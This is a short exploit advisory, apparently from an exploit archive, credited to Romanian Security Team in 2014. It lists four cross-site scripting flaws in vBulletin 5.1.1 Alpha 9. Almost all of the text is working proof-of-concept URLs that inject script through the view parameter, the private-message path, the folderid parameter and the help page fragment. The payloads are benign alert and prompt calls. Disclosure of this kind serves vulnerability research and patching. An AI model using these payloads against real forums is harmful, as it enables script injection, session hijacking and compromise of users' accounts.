vBulletin version 5.1 suffers from multiple cross site scripting vulnerabilities.
b4526db8b9f3e784a8e3d60a613cf3197b0d51e48b0129a6da0f920693f62a15
Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities
Authors: Romanian Security Team
Website: https://rstforums.com/forum/
Date published: 19 April 2014
Software: vBulletin
Version: 5.1.1 Alpha 9
[XSS] Random topic
- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//
[XSS] New private message
- https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>
[XSS] View PM: you must know or bruteforce private message ID (830372)
- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//
[DOM XSS] Help
- https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>
(c) Romanian Security Team 2014